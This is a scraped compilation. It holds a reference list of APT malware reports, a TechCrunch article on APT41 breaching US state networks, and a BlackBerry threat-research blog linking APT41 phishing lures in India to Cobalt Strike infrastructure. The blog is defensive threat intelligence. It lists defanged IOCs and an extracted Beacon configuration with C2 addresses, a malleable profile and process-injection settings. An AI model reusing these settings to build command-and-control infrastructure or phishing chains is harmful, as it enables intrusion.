
×Select Content2019-04-01

Macnica Networks

Macnica NetworksOceanLotus Attack on Southeast Asian Automotive Industry CACTUSTORCH

Cobalt Strike

×Select Content2019-04-01

Macnica Networks

Macnica NetworksTrends in Cyber ​​Espionage Targeting Japan 2nd Half of 2018 Anel

Cobalt Strike

Datper

PLEAD

Quasar RAT

RedLeaves

taidoor

Zebrocy

×Select Content2019-03-24

One Night in Norfolk

Kevin PerlowJEShell: An OceanLotus (APT32) Backdoor Cobalt Strike

KerrDown

×Select Content2019-03-19

NSHC

ThreatRecon TeamSectorM04 Targeting Singapore – An Analysis PlugX

Termite

×Select Content2019-03-11

ESET Research

Marc-Etienne M.LéveilléGaming industry still in the scope of attackers in Asia APT41

×Select Content2019-02-27

Secureworks

CTU Research TeamA Peek into BRONZE UNION’s Toolbox Ghost RAT

HyperBro

ZXShell

×Select Content2019-02-27

Morphisec

Alon Groisman,

Michael GorelikNew Global Cyber Attack on Point of Sale Sytem Cobalt Strike

×Select Content2019-02-26

Fox-IT

Fox ITIdentifying Cobalt Strike team servers in the wild Cobalt Strike

×Select Content2019-01-01

MITRE

MITRE ATT&CKGroup description: Winnti Group APT41

×Select Content2019-01-01

Virus Bulletin

Bowen Pan,

Lion GuA vine climbing over the Great Firewall: A long-term attack against China Poison Ivy

ZXShell

×Select Content2019-01-01

MITRE

MITRE ATT&CKTool description: BLACKCOFFEE BLACKCOFFEE

×Select Content2019-01-01

MITRE

MITRE ATT&CKTool description: China Chopper CHINACHOPPER

×Select Content2018-12-24

Twitter (@MrDanPerez)

Dan PerezTweet on hashes for CROSSWALK CROSSWALK

×Select Content2018-12-14

Australian Cyber Security Centre

ASDInvestigationreport: Compromise of an Australian companyvia their Managed Service Provider PlugX

RedLeaves

×Select Content2018-11-19

FireEye

Andrew Thompson,

Ben Withnell,

Jonathan Leathery,

Matthew Dunwoody,

Michael Matonis,

Nick CarrNot So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign Cobalt Strike

×Select Content2018-11-18

Stranded on Pylos Blog

JoeCozyBear – In from the Cold? Cobalt Strike

APT29

×Select Content2018-10-01

Macnica Networks

Macnica NetworksTrends in cyber espionage (targeted attacks) targeting Japan | First half of 2018 Anel

Cobalt Strike

Datper

FlawedAmmyy

Quasar RAT

RedLeaves

taidoor

Winnti

xxmm

×Select Content2018-10-01

FireEye

Katie Nickels,

Regina ElwellATT&CKing FIN7 Bateleur

BELLHOP

Griffon

ANTAK

POWERPIPE

POWERSOURCE

HALFBAKED

BABYMETAL

Carbanak

Cobalt Strike

DNSMessenger

DRIFTPIN

PILLOWMINT

SocksBot

×Select Content2018-10-01

Group-IB

Group-IBHi-Tech Crime Trends 2018 BackSwap

Cobalt Strike

Cutlet

Meterpreter

×Select Content2018-08-21

Trend Micro

Jaromír Hořejší,

Joseph C Chen,

Kawabata Kohei,

Kenney LuOperation Red Signature Targets South Korean Companies 9002 RAT

PlugX

×Select Content2018-08-03

JPCERT/CC

Takuya Endo,

Yukako UchidaVolatility Plugin for Detecting Cobalt Strike Beacon Cobalt Strike

×Select Content2018-07-31

Medium Sebdraven

Sébastien LarinierMalicious document targets Vietnamese officials 8.t Dropper

PlugX

1937CN

×Select Content2018-07-31

Github (JPCERTCC)

JPCERT/CCScanner for CobaltStrike Cobalt Strike

×Select Content2018-07-26

CrowdStrike

Adam MeyersMeet CrowdStrike’s Adversary of the Month for July: WICKED SPIDER APT41

×Select Content2018-05-21

LAC

Yoshihiro IshikawaConfirmed new attacks by APT attacker group menuPass (APT10) Cobalt Strike

×Select Content2018-05-09

COUNT UPON SECURITY

Luis RochaMalware Analysis - PlugX - Part 2 PlugX

×Select Content2018-05-03

ProtectWise

Tom HegelBurning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers APT41

×Select Content2018-03-16

FireEye

FireEyeSuspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries badflick

BLACKCOFFEE

CHINACHOPPER

homefry

murkytop

SeDll

APT40

×Select Content2018-03-13

Kaspersky Labs

Denis Makrushin,

Yury NamestnikovTime of death? A therapeutic postmortem of connected medicine PlugX

×Select Content2018-02-04

COUNT UPON SECURITY

Luis RochaMALWARE ANALYSIS – PLUGX PlugX

×Select Content2017-12-20

CrowdStrike

Adam KozyAn End to “Smash-and-Grab” and a Move to More Targeted Approaches CHINACHOPPER

×Select Content2017-12-18

LAC

Yoshihiro IshikawaRelationship between PlugX and attacker group "DragonOK" PlugX

×Select Content2017-08-15

Kaspersky Labs

GReATShadowPad in corporate networks ShadowPad

×Select Content2017-06-27

Palo Alto Networks Unit 42

Esmid Idrizovic,

Tom LancasterParanoid PlugX PlugX

×Select Content2017-06-06

FireEye

Ian AhlPrivileges and Credentials: Phished at the Request of Counsel Cobalt Strike

×Select Content2017-06-06

Mandiant

Ian AhlPrivileges and Credentials: Phished at the Request of Counsel Cobalt Strike

APT19

×Select Content2017-05-31

MITRE

MITRE ATT&CKAxiom Derusbi

9002 RAT

BLACKCOFFEE

Derusbi

Ghost RAT

HiKit

PlugX

ZXShell

APT17

×Select Content2017-05-31

MITRE

MITRE ATT&CKAPT17 BLACKCOFFEE

APT17

×Select Content2017-04-27

US-CERT

US-CERTAlert (TA17-117A): Intrusions Affecting Multiple Victims Across Multiple Sectors PlugX

RedLeaves

×Select Content2017-04-26

Youtube (Kaspersky)

KasperskyChina's Evolving Cyber Operations: A Look into APT19's Shift in Tactics Cobalt Strike

APT19

×Select Content2017-04-03

JPCERT/CC

Shusei TomonagaRedLeaves - Malware Based on Open Source RAT PlugX

RedLeaves

Trochilus RAT

×Select Content2017-04-01

PricewaterhouseCoopers

PricewaterhouseCoopersOperation Cloud Hopper: Technical Annex ChChes

PlugX

Quasar RAT

RedLeaves

Trochilus RAT

×Select Content2017-03-22

Trend Micro

Cedric PernetWinnti Abuses GitHub for C&C Communications EASYNIGHT

APT41

×Select Content2017-02-21

JPCERT/CC

Shusei TomonagaPlugX + Poison Ivy = PlugIvy? - PlugX Integrating Poison Ivy’s Code PlugX

×Select Content2017-02-13

RSA

RSA ResearchKINGSLAYER – A SUPPLY CHAIN ATTACK CodeKey

PlugX

×Select Content2017-01-25

Microsoft

Microsoft Defender ATP Research TeamDetecting threat actors in recent German industrial attacks with Windows Defender ATP APT41

×Select Content2016-12-08

Deutsche Welle

Deutsche WelleThyssenkrupp victim of cyber attack APT41

×Select Content2016-10-28

Github (smb01)

smb01zxshell repository ZXShell

×Select Content2016-10-11

Symantec

Symantec Security ResponseOdinaff: New Trojan used in high level financial attacks Cobalt Strike

KLRD

MimiKatz

Odinaff

×Select Content2016-08-25

Malwarebytes

Malwarebytes LabsUnpacking the spyware disguised as antivirus PlugX

×Select Content2016-06-13

Macnica Networks

Macnica NetworksSurvey of the actual situation of the large-scale cyber spy activity that hit Japan | 1st edition Emdivi

PlugX

×Select Content2016-05-03

William ShowalterA Universal Windows Bootkit APT41

×Select Content2016-03-02

RSA Conference

Vanja SvajcerDissecting Derusbi Derusbi

×Select Content2016-01-22

RSA Link

Norton SantosPlugX APT Malware PlugX

×Select Content2015-12-15

Airbus Defence & Space

Fabien PerigaudNewcomers in the Derusbi family Derusbi

×Select Content2015-10-08

Virus Bulletin

Eric Leung,

Micky Pun,

Neo TanCatching the silent whisper: Understanding the Derusbi family tree Derusbi

×Select Content2015-08-01

Arbor Networks

ASERT TeamUncovering the Seven Pointed Dagger 9002 RAT

EvilGrab

PlugX

Trochilus RAT

APT9

×Select Content2015-06-22

Kaspersky Labs

Dmitry TarakanovGames are over: Winnti is now targeting pharmaceutical companies Winnti

APT41

×Select Content2015-05-18

Tetsuji TanigawaTT Malware Log BLACKCOFFEE

×Select Content2015-05-01

FireEye

FireEyeHIDING IN PLAIN SIGHT: FIREEYE AND MICROSOFT EXPOSE OBFUSCATION TACTIC BLACKCOFFEE

×Select Content2015-04-14

Youtube (Kaspersky)

Kris McConkeyFollowing APT OpSec failures BLACKCOFFEE

Mangzamel

APT17

×Select Content2015-02-27

ThreatConnect

ThreatConnect Research TeamThe Anthem Hack: All Roads Lead to China Derusbi

×Select Content2015-02-06

CrowdStrike

CrowdStrikeCrowdStrike Global Threat Intel Report 2014 BlackPOS

CryptoLocker

Derusbi

Elise

Enfal

EvilGrab

Gameover P2P

HttpBrowser

Medusa

Mirage

Naikon

NetTraveler

pirpi

PlugX

Poison Ivy

Sakula RAT

Sinowal

sykipot

taidoor

×Select Content2015-01-29

JPCERT/CC

Shusei TomonagaAnalysis of a Recent PlugX Variant - “P2P PlugX” PlugX

×Select Content2014-11-01

Novetta

NovettaZoxPNG Analysis BLACKCOFFEE

×Select Content2014-10-28

Cisco

Alain Zidouemba,

Andrea Allievi,

Douglas Goddard,

Shaun HurleyThreat Spotlight: Group 72, Opening the ZxShell ZXShell

×Select Content2014-10-28

Novetta

NovettaDerusbi (Server Variant) Analysis Derusbi

×Select Content2014-06-27

SophosLabs

Gabor SzappanosPlugX - The Next Generation PlugX

×Select Content2014-06-10

FireEye

Mike ScottClandestine Fox, Part Deux PlugX

×Select Content2014-01-06

Airbus

Fabien PerigaudPlugX: some uncovered points PlugX

×Select Content2014-01-01

RSA

RSA ResearchRSA Incident Response: Emerging Threat Profile Shell_Crew Derusbi

×Select Content2013-08-07

FireEye

Dennis Hanzlik,

Ian Ahl,

Tony LeeBreaking Down the China Chopper Web Shell - Part I CHINACHOPPER

×Select Content2013-04-11

Kaspersky Labs

GReATWinnti. More than just a game APT41

×Select Content2013-04-11

Kaspersky Labs

GReATWinnti FAQ. More Than Just a Game APT41

×Select Content2013-03-29

Computer Incident Response Center Luxembourg

CIRCLAnalysis Report (TLP:WHITE) Analysis of a PlugX variant (PlugX version 7.0) PlugX

×Select Content2013-03-26

Contextis

Kevin O’ReillyPlugX–Payload Extraction PlugX

×Select Content2013-02-27

Trend Micro

Abraham CambaBKDR_RARSTONE: New RAT to Watch Out For PlugX

Naikon

×Select Content2012-02-10

tracker.h3x.eu

Malware Corpus TrackerInfo for Family: plugx PlugX

×Select Content2012-01-01

Cobalt Strike

Cobalt StrikeCobalt Strike Website Cobalt Strike

Credits: MISP ProjectPropose Change of Library Entry×URLTitleAuthorsLanguageDate

Please use YYYY-MM-DD, YYYY-MM, or YYYY.

Organization (optional)Referenced families (optional)Select families...Comment

Add additional information to explain your proposal.

Your suggestion will be reviewed before being published.

Thank you for contributing!

CancelSubmitImpressum

     

Datenschutzerklärung

China-backed APT41 compromised 'at least' six US state governments | TechCrunch

China-backed APT41 compromised 'at least' six US state governments | TechCrunch

TechCrunch

plus-bold

TechCrunch

Open Navigation

TechCrunch

China-backed APT41 compromised ‘at least’ six US state governments

Carly Page

2 years

The prolific China APT41 hacking group, known for carrying out espionage in parallel with financially motivated operations, has compromised multiple U.S. state government networks, according to cybersecurity giant Mandiant.

The group — seemingly undeterred by U.S. indictments against five APT41 members in 2020 — conducted a months-long campaign during which it targeted and successfully breached at least six U.S. state networks, all of which have been notified by Mandiant but were not named.

Between May 2021 and February 2022, the hacking group used vulnerable internet-facing web applications to gain an initial foothold into state networks. This included exploiting a zero-day vulnerability in a software application called USAHerds, used by 18 states for animal health management, and the now-infamous so-called Log4Shell vulnerability in Apache Log4j, a ubiquitous Java logging library.

Mandiant said APT41 began exploiting Log4Shell within hours of the Apache Foundation publicly sounding the alarm about the vulnerability in December 2021, which led to the compromise of two U.S. state government networks and other targets in the insurance and telecoms industries. After gaining that foothold on the network, APT41 went on to perform “extensive” credential collection.

The investigation also uncovered a variety of new techniques, evasion methods and capabilities used by APT41. In one instance after APT41 gained access to a network via SQL injection vulnerability in a proprietary web application — activity that was contained by Mandiant — APT41 came back two weeks later to recompromise the network with a brand new zero-day exploit. The group also tailored its malware to their victim’s environments and frequently updated the encoded data on a specific forum post, enabling the malware to receive instructions from the attackers’ command and control server.

Though Mandiant said it saw evidence of the hackers exfiltrating personally identifiable information that’s typically consistent with an espionage operation, the goal of the campaign remains unclear — but whatever the group is after must be of high value.

Geoff Ackerman, principal threat analyst at Mandiant, said that while the world is focused on the potential of Russian cyber threats in the wake of the invasion of Ukraine, this investigation is a reminder that other major threat actors around the world are continuing their operations as usual.

“We cannot allow other cyber activity to fall to the wayside, especially given our observations that this campaign from APT41, one of the most prolific threat actors around, continues to this day,” said Ackerman. “APT41 is truly a persistent threat, and this recent campaign is another reminder that state-level systems in the United States are under unrelenting pressure from nation-state actors like China, as well as Russia.”

Justice Department charges five Chinese members of APT41 over cyberattacks on US companies

Drawing a Dragon: Connecting the Dots to Find APT41

Drawing a Dragon: Connecting the Dots to Find APT41

Skip Navigation

BlackBerry Logo

Cybersecurity

Automotive & IOT

Critical Communications

Inside BlackBerry

×

BlackBerry Blog

BlackBerry Blog

Drawing a Dragon: Connecting the Dots to Find APT41

Drawing a Dragon: Connecting the Dots to Find APT41

RESEARCH & INTELLIGENCE / 10.05.21 /

The BlackBerry Research & Intelligence Team

Share on Twitter

Share on Facebook

Share on Linked In

Email

Executive Summary

The BlackBerry Research & Intelligence Team recently connected seemingly disparate malware campaigns, which began with an unusual Cobalt Strike configuration that was first included in a blog post published the same month as COVID-19 lockdowns began in Europe and the U.S. What we found led us through a malicious infrastructure that had been partially documented in articles by several other research organizations.

The image we uncovered was that of a state-sponsored campaign that plays on people’s hopes for a swift end to the pandemic as a lure to entrap its victims. And once on a user’s machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic.

Introduction

APT41 is a prolific Chinese state-sponsored cyberthreat group that has conducted malware campaigns related to espionage and financially motivated criminal activity dating as far back as 2012. This threat group has targeted organizations around the world, in verticals such as travel, telecommunications, healthcare, news and education.

APT41 has often used phishing emails with malicious attachments as an initial infection vector. Once it has gained access to a target organization, it typically deploys more advanced malware to establish a persistent foothold. This group uses a variety of different malware families including information stealers, keyloggers and backdoors.

BlackBerry researchers have been monitoring Cobalt Strike activity that used a bespoke, malleable command-and-control (C2) profile, which had settings that were previously documented in a report by FireEye in March of 2020. They attributed this configuration to APT41-related activity.

We were able to uncover what we believe is additional APT41 infrastructure by taking these unique aspects and following the trail of digital breadcrumbs. Overlapping indicators of compromise (IOCs) linked the trail of our findings to those of two additional campaigns documented by Positive Technologies and Prevailion. These posts were titled "Higaisa or Winnti? APT41 backdoors, old and new," and "The Gh0st Remains the Same," respectively.

We also found three additional phishing lures targeting victims in India, containing information related to new tax legislation and COVID-19 statistics. These messages masqueraded as being from Indian government entities.

These lures were part of an execution chain that had the goal of loading and executing a Cobalt Strike Beacon on a victim’s network. The phishing lures and attachments also fit tactics that were previously used in infection vectors by APT41. These findings show that the APT41 group is still regularly conducting new campaigns, and that they will likely continue to do so in the future.

Connecting the Dots

A recent blog post published by FireEye in March of 2020 explored APT41’s tactics, including their use of malicious documents, exploits and Cobalt Strike. The report indicated that the group was using a bespoke, malleable C2 profile with at least one of its Cobalt Strike Beacons.

A malleable C2 profile is a feature within Cobalt Strike that allows an attacker to customize a Beacon’s network communications to its C2 channel in a way that allows it to blend into normal traffic on a victim network. For example, there are publicly available profiles that are designed to look like legitimate network traffic from Amazon, Gmail, OneDrive and many others.

We uncovered a malleable C2 profile on GitHub that is very similar to that of the one mentioned in the FireEye blog. This one seems to have been authored by a Chinese security researcher with the pseudonym “1135.”

These profiles had several similarities: Both used jQuery Malleable C2 profiles, and portions of the HTTP GET profile block are almost identical. HTTP header fields such as “accept,” “user-agent,” “host,” and “referer,” as well as the “set-uri” field, were all exact matches to the profile data listed in the FireEye blog.

Figure 1: JQuery Malleable C2 from the ‘1135’ Github

Armed with this data point, we can perform some deeper visual analysis of Beacon configuration data in our possession to reveal patterns that are only perceptible when a large data set is accessible. By extracting and correlating the HTTP headers used in the GET and POST requests defined in the Beacon configs, we can generate revealing connections between seemingly disparate Cobalt Strike infrastructure.

Figure 2: Clustering on "cdn.bootcss.com" HttpPost_Metadata

While we identified a relatively small number of Beacons using the BootCSS domain as part of their Malleable C2 configuration, there were also a few clusters with unique configuration metadata that enabled us to identify additional beacons related to APT41.

The Beacons served by these new nodes are using a different malleable profile to those in the original cluster that attempts to make the Beacon traffic look like legitimate Microsoft traffic.

IP

Domain

144.202.98.198

zalofilescdn[.]com

107.182.24.70

isbigfish[.]xyz

185.14.29.72

www[.]microsoftbooks[.]dns-dns[.]com

193.42.114.73

www[.]microsoftbooks.dns-dns[.]com

149.28.78.89

www[.]mlcrosoft[.]site

23.67.95.153

ns[.]mircosoftdoc[.]com

104.27.132.211

cdn[.]microsoftdocs[.]workers[.]dev

ccdn[.]microsoftdocs[.]workers[.]dev

The domains we found share similarities in their naming convention, which try to masquerade as legitimate Microsoft® domains. Searching for these IPs and domains in a variety of open source intelligence tool (OSINT) repositories reveals some connections that bear further examination. The IP 107.182.24[.]70 as well as the domain www[.]mlcrosoft[.]site both appear within a blog from from Positive Technologies. Further hunting for the IP address 149.28.78[.]89 reveals links to a campaign mentioned in the previously referenced Prevailion blog.

Gh0st in the Machine

In that blog, we can find two IOCs that appear in the cluster above; the IP 149.28.78.89, and the domain mlcrosoft.site. The blog associated those IOCs with the Higaisa advanced persistant threat (APT) group, which operates out of North Korea.

The domain mlcrosoft[.]site also appears in the blog from Positive Technologies. That article has additional overlapping IOCs, and talks about the same campaign as mentioned in the Prevailion blog. However, it makes a strong argument that the activity is from APT41 rather than Higaisa APT.

When we do a side-by-side comparison of the domains from the Positive Technologies blog and our datasets, there is a strong similarity between naming conventions used:

BlackBerry IOCs

Positive Technologies IOCs

www[.]microsoftbooks.dns-dns[.]com

cdn[.]microsoftdocs.workers[.]dev

ccdn[.]microsoftdocs.workers[.]dev

ns[.]mircosoftdoc[.]com

microsoftbooks[.]dynamic-dns[.]net

microsoftdocs[.]dns05[.]com

ns[.]microsoftdocs.dns05[.]com

ns1[.]microsoftsonline[.]net

We also discovered that mlcrosoft[.]site and mircosoftdoc[.]com both appear in the Azure-Sentinel detection rule for known Barium phishing domains. The IP 144.202.98[.]198 has also been previously associated with APT41/Barium by a Microsoft researcher.

Another IP from this cluster, 185.14.29[.]72, was recently providing virtual hosting for several domain names such as:

chaindefend[.]bid

defendchain.[]xyz

assistcustody[.]xyz

microsoftonlineupdate.dynamic-dns[.]net

Previously, this IP has been associated with DNS resolutions for schememicrosoft[.]com and www.microsoftbooks[.]dns-dns.com. Several of the domains also have links to 209.99.40[.]222, an IP that is known to perform malicious DNS/bulletproof hosting.

 As of Sept. 14, 2021, this IP resolved to a new domain very briefly: www.microsoftonlineupdate.dynamic-dns[.]net. This domain also conforms to a naming convention similar to those we have seen in the previous table.

Figure 3: Teamserver geolocation

Phishing Lures

By performing further intelligence correlation to investigate these URLs further, we found a malicious PDF that reaches out to ccdn[.]microsoftdocs.workers[.]dev. This site had previously hosted a Cobalt Strike Team Server.

Further digging reveals a set of three PDFs used as malicious phishing lures, which are linked to the *.microsoftdocs.workers[.]dev domains. These lures all target victims in India, either promising information regarding new India-specific income taxation rules or COVID-19 advisories.

The first lure – “Income tax new rules for NRI.pdf.lnk” – contains both a PDF document and an embedded PowerShell script. Upon execution, the PDF is displayed to the user, after which the PowerShell is executed in the background.

Figure 4: Phishing lure 1

The PowerShell script downloads and executes a payload via “%temp%\conhost.exe,” which loads a payload file called "event.dat." This .DAT file is a Cobalt Strike Beacon.

The second and third lures each have similar execution flows and component parts; a PDF lure, conhost.exe, and an event.* payload. In this case, these event files had a .LOG extension, rather than .DAT.

The biggest difference between the second and third lures is that one uses a self-extracting archive named “India records highest ever single day covid_19 recoveries.pdf.exe,” and the other uses a ZIP file named “India records highest ever single day COVID-19 recoveries.zip.”

Figure 5: Contents of lures 2 and 3

Lures two and three also contain the same information within their respective PDFs. Both relate to a record high number of COVID-19 recoveries in India, information which purports to be from the Indian Government Ministry of Health & Family Welfare.

Figure 6: Phishing lure 2 and 3 PDF contents

By extracting the configurations from each of the three lures’ event.* Beacon payloads, we can see that the C2 server address used in the configuration data differs slightly:

Lure-1 uses ccdn[.]microsoftdocs.workers.dev/en-us/windows/apps/

Lure-2 & 3 use cdn[.]microsoftdocs.workers.dev/en-us/windows/apps/

The same can be seen for the HttpGet_Metadata and HttpPost_Metadata host addresses:

Lure-1 uses ccdn[.]microsoftdocs.workers.dev

Lure-2 & 3 use cdn[.]microsoftdocs.workers.dev

KEY

VALUE

BeaconType

HTTPS

Port

443

SleepTime

1000

MaxGetSize

1398104

Jitter

0

MaxDNS

255

C2Server

ccdn[.]microsoftdocs.workers.dev,/en-us/windows/apps/ (Lure 1)

cdn[.]microsoftdocs.workers.dev,/en-us/windows/apps/ (Lure 2&3)

UserAgent

Mozilla/5.0 (MSIE 10; Windows NT 6.1; Trident/5.0)

HttpPostUri

/en-us/windows/windows-server/

Malleable_C2_Instructions   

Base64 decode

HttpGet_Metadata

ConstHeaders

Host: ccdn[.]microsoftdocs.workers.dev (Lure-1)

Host: cdn[.]microsoftdocs.workers.dev(Lure-2&3)

User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/5.0)

Accept: */*

Accept-Encoding: gzip, deflate, br

Metadata

base64

prepend "__cfduid="

header "Cookie"

HttpPost_Metadata

ConstHeaders

Host: ccdn[.]microsoftdocs.workers.dev (Lure-1)

Host: cdn[.]microsoftdocs.workers.dev(Lure-2&3)

User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/5.0)

Accept: */*

Accept-Encoding: gzip, deflate, br

SessionId

base64url

parameter "k"

Output

base64

print

DNS_Idle

104.88.34.55

DNS_Sleep

0

HttpGet_Verb

GET

HttpPost_Verb

POST

HttpPostChunk

0

Spawnto_x86

%windir%\syswow64\gpupdate.exe

Spawnto_x64

%windir%\sysnative\gpupdate.exe

CryptoScheme

0

Proxy_Behavior

Use IE settings

Watermark

305419896

bStageCleanup

False

bCFGCaution

False

KillDate

0

bProcInject_StartRWX

True

bProcInject_UseRWX

True

bProcInject_MinAllocSize

0

ProcInject_PrependAppend_x86

Empty

ProcInject_PrependAppend_x64

Empty

ProcInject_Execute

CreateThread

SetThreadContext

CreateRemoteThread

RtlCreateUserThread

ProcInject_AllocationMethod

VirtualAllocEx

bUsesCookies

True

 

A report by Subex from September 2020 described a campaign using similar phishing lures, also targeting Indian nationals, which they attributed to the Evilnum APT group. The indicators of compromise (IOCs) in this report are quite similar (or even identical) to those of the phishing lures we’ve previously investigated. We believe that this attack was perpetrated by APT41 and not the Evilnum group for several reasons:

The first is that the Event.* payloads are in fact Cobalt Strike Beacons, as per the extracted configuration data shown in the table above. This behavior is indicative of APT41 rather than the Golden Chickens Malware-as-a-Service (MaaS), as reported in the Subex Evilnum APT report.

The second reason is that there are several configuration settings that indicate APT41 activity when they’re aggregated. These same settings were present within the phishing lure Beacons and have been observed in previous attacks by this group.

In addition to this, the aforementioned blog from Positive Technologies contained overlapping infrastructure that ties in with what we have observed. They documented similar phishing lures using PDF documents as bait, which they attributed to APT41.

These lures follow a similar naming convention to the ones we’ve documented here. Their execution chains encompass both a loader and payload component, but Cobalt Strike was just one of several potential payloads that were listed.

The use of spear-phishing attachments to gain initial access has been a known APT41 tool, technique and procedure (TTP) for years. In addition, the previously discussed overlap in network infrastructure adds credence to this being an APT41-affiliated campaign.

Conclusions

It’s a rare treat for a research organization to have a truly robust set of data about any one threat. Having a security industry that puts a strong emphasis on the public sharing of information means that we can put our collective heads together to create a more complete picture.

An article posted by FireEye initially pointed us to a Malleable C2 profile for Cobalt Strike. We researched this and found a similar profile that had Beacons using the BootCSS domain as part of their configuration. This then pointed us to additional overlapping configuration metadata within the Beacon configuration, which subsequently steered us into identifying a whole new cluster and a new set of domains.

This discovery led us to find connections with the campaign referenced in the Prevailion post, which ushered us into seeing overlaps within the IOCs in the Positive Technologies blog. We found that these IOCs also overlap with those of the Azure-Sentinel detection rule for the APT41 threat actor group.

When we looked deeper into the activities of the threats within these clusters, the similarities continued. Reports from Subex and Positive Technologies described campaigns using PDF files that lured people in with a variety of tactics, including leveraging people’s desire to see information indicating a swift end to the COVID-19 pandemic.

With the resources of a nation-state level threat group, it’s possible to create a truly staggering level of diversity in a threat infrastructure. And while no one security group has that same level of funding, by pooling our collective brainpower we can still uncover the tracks that the cybercriminals involved worked so hard to hide.

Indicators of Compromise (IoCs)

Please view our GitHub for the IoCs referenced in this report: https://github.com/blackberry/threat-research-and-intelligence/blob/main/APT41.csv

Want to learn more about cyber threat hunting? Check out the BlackBerry Research & Intelligence Team’s new book, Finding Beacons in the Dark: A Guide to Cyber Threat Intelligence - now available for pre-order here.

About The BlackBerry Research & Intelligence Team

The BlackBerry Research & Intelligence team examines emerging and persistent threats, providing intelligence analysis for the benefit of defenders and the organizations they serve.

Share on Twitter

Share on Facebook

Share on Linked In

Email

Back

Facebook

Twitter

YouTube

Instagram

Corporate

Company

Newsroom

Investors

Careers

Leadership

Corporate Responsibility

Certifications

Customer Success

Developers

Enterprise Platform & Apps

BlackBerry QNX Developer Network

Blogs

BlackBerry ThreatVector Blog

Developers Blog

Help Blog

Legal

Overview

Accessibility

Patents

Trademarks

Privacy Policy

© 2024 BlackBerry Limited. All rights reserved.